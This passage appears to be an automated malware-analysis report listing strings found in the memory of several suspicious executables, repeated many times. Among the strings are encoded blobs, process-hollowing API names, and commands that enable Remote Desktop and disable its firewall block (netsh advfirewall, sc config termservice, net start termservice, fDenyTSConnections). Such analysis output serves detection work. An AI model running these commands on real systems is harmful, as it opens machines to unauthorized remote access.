S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE String found in binary or memory: net start termservice
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE, 0000000B.00000002.996423786.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String found in binary or memory: net start termservice
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE, 0000000B.00000002.996423786.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE, 0000000B.00000003.955918275.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE, 0000000B.00000003.955918275.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe String found in binary or memory: net start termservice
Source: rapes.exe, 0000000C.00000002.991468562.0000000000B01000.00000040.00000001.01000000.0000000F.sdmp String found in binary or memory: net start termservice
Source: rapes.exe, 0000000C.00000002.991468562.0000000000B01000.00000040.00000001.01000000.0000000F.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe, 0000000C.00000003.949456172.0000000004D30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: rapes.exe, 0000000C.00000003.949456172.0000000004D30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe, 00000015.00000003.1336929866.0000000005300000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: rapes.exe, 00000015.00000003.1336929866.0000000005300000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: amnew.exe, 00000029.00000002.1626859136.00000000004D1000.00000002.00000001.01000000.00000017.sdmp String found in binary or memory: net start termservice
